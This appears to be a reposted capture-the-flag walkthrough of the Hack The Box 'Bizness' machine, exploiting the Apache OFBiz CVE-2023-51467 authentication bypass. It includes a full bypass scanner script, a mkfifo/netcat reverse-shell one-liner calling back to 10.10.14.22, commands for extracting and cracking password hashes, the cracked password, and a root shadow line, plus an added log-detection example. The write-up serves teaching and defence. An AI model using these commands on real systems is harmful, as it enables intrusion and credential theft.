HTB-Bizness notes

admin | 2024-01-08 22:03:17 | 172 views | 3812 characters | 12 min 42 s read


Scanning the target

nmap -sC -sV -T4 -Pn 10.10.11.252


The scan reveals the domain bizness.htb; add it to the hosts file:

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

Then open port 80 in the browser and take a look.


Port 80 shows nothing useful on the surface, so fuzz the directories:

dirsearch -u https://bizness.htb/


This looks like a backend login page.


There is a lot of information here: the application is OFBiz, and the lower-right corner shows version 18.12. Search online for that version directly.


First, use the following script to check Apache OFBiz for the CVE-2023-51467 authentication bypass (the script itself only scans; exploitation follows below):

GitHub - Chocapikk/CVE-2023-51467: Apache OfBiz Auth Bypass Scanner for CVE-2023-51467

exploit.py

import os
import argparse
import requests
import concurrent.futures
from threading import Lock
from rich.console import Console
from typing import List, Optional
from urllib.parse import urlparse
from alive_progress import alive_bar
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Targets are often reached over self-signed TLS, so certificate warnings are silenced.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
console = Console()


class CVE_2023_51467:
    def __init__(self, urls: List[str], threads: int, output_file: str):
        self.urls = urls
        self.threads = threads
        self.output_file = output_file
        self.file_lock = Lock()

    def check_url(self, base_url: str) -> Optional[str]:
        # Try http and https when the caller gave no scheme; keep the given one otherwise.
        parsed_url = urlparse(base_url)
        schemes = ["http", "https"] if not parsed_url.scheme else [parsed_url.scheme]
        for scheme in schemes:
            url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}"
            if self.is_url_accessible(url):
                return url
        return None

    def is_url_accessible(self, url: str) -> bool:
        try:
            response = requests.head(url, verify=False, timeout=5, allow_redirects=True)
            return response.status_code < 500
        except requests.RequestException:
            return False

    def scan_url(self, base_url: str):
        target_url = self.check_url(base_url)
        if target_url:
            try:
                # Empty USERNAME plus requirePasswordChange=Y is the bypass condition;
                # a vulnerable instance answers the ping request with "PONG".
                response = requests.get(
                    f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y",
                    verify=False,
                    timeout=10,
                    allow_redirects=True,
                )
                if response.status_code == 200 and "PONG" in response.text:
                    console.log(
                        f"Vulnerable URL found: {base_url}, Response: {response.text.strip()}"
                    )
                    vulnerable_url = f"{urlparse(target_url).scheme}://{urlparse(target_url).netloc}\n"
                    with self.file_lock:
                        with open(self.output_file, "a") as file:
                            file.write(vulnerable_url)
            except Exception as e:
                console.log(f"Error scanning {base_url}: {e}")

    def run(self):
        with alive_bar(len(self.urls), enrich_print=False) as bar:
            with concurrent.futures.ThreadPoolExecutor(
                max_workers=self.threads
            ) as executor:
                future_to_url = {
                    executor.submit(self.scan_url, url): url for url in self.urls
                }
                for _ in concurrent.futures.as_completed(future_to_url):
                    bar()


def main():
    script_name = os.path.basename(__file__)
    parser = argparse.ArgumentParser(
        description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.",
        epilog=f"Example usage:\n"
        f"  python {script_name} -u http://example.com\n"
        f"  python {script_name} -f urls.txt -o output.txt -t 50",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", help="Single URL to send GET request to")
    parser.add_argument(
        "-f", "--file", help="File containing list of base URLs to scan"
    )
    parser.add_argument(
        "-o",
        "--output",
        default="output.txt",
        help="File to write vulnerable systems to",
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        default=10,
        help="Number of concurrent threads to use",
    )
    args = parser.parse_args()

    urls = []
    if args.file:
        with open(args.file, "r") as file:
            urls = [line.strip() for line in file]
    elif args.url:
        urls.append(args.url)
    else:
        console.log("No URL or file provided")
        return

    scanner = CVE_2023_51467(urls, args.threads, args.output)
    scanner.run()


if __name__ == "__main__":
    main()
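As an added defender's example (not from the original post or the scanner's repository), here is a small Python check that flags the same bypass request shape the scanner sends when it appears in web-server access logs. The sample log lines and the function names are constructed for this example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); not taken from the page.
# Lines 1 and 3 carry the CVE-2023-51467 bypass pattern, lines 2 and 4 are benign.
SAMPLE_LOG = """\
10.10.14.22 - - [08/Jan/2024:22:01:10 +0000] "GET /webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y HTTP/1.1" 200 4 "-" "python-requests/2.31.0"
10.10.14.22 - - [08/Jan/2024:22:01:11 +0000] "GET /webtools/control/ping HTTP/1.1" 302 0 "-" "python-requests/2.31.0"
192.0.2.7 - - [08/Jan/2024:22:02:30 +0000] "POST /webtools/control/xmlrpc?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1532 "-" "curl/8.4.0"
192.0.2.9 - - [08/Jan/2024:22:03:00 +0000] "GET /control/main HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_bypass_attempt(target: str) -> bool:
    """True when the request target has the CVE-2023-51467 auth-bypass shape:
    an OFBiz controller URL with requirePasswordChange=Y and an empty (or bare)
    USERNAME or PASSWORD parameter, the combination that skips the login check."""
    parts = urlsplit(target)
    if "/control/" not in parts.path:
        return False
    # keep_blank_values=True so a bare "USERNAME" (no "=") still shows up as an empty value
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("requirePasswordChange", [""])[0].upper() != "Y":
        return False
    username = qs.get("USERNAME", [""])[0]
    password = qs.get("PASSWORD", [""])[0]
    return username == "" or password == ""


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per log line that looks like a bypass attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_bypass_attempt(m.group("target")):
            hits.append({k: m.group(k) for k in ("ip", "ts", "method", "target", "status")})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["status"]}')
```

A status of 200 on such a request is the stronger signal, since a patched OFBiz rejects the bypass; on a vulnerable host the fix is to upgrade to a release that closes CVE-2023-51467.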


The scanner reports that this site is vulnerable, so next use the GUI tool shared by a community member.


Now we can get a reverse shell directly:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.22 4444 >/tmp/f


After the reverse shell connects we land directly in /opt. Curious, I look at what folders are underneath.


Go into /opt/ofbiz/runtime/data/derby. It contains an ofbiz folder whose seg0 folder holds many .dat files.


Use grep to search directly for the string "password"; since these are .dat files, treat the binary data as text (-a):

grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .


The hash was found successfully.


From the hash above, this is a SHA-family hash: the $d$ may indicate the number of hash iterations or be part of the salt, and the encoded part that follows is the SHA-processed value. First decode it with CyberChef.


Decode it to hex. Because our hash is salted, the format to use is hash:salt; crack it directly with hashcat, with the salt value d:

hashcat -m 120 hash /home/ioi/rockyou.txt


The password was cracked successfully: monkeybizness. Escalate privileges with it directly and obtain both the user and root flags:


root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::


Originally published on the WeChat public account (Jiyou too beautiful): HTB-Bizness notes

Source (CN-SEC Chinese site; please keep this link when reposting, with thanks to the original author): https://cn-sec.com/archives/2376170.html
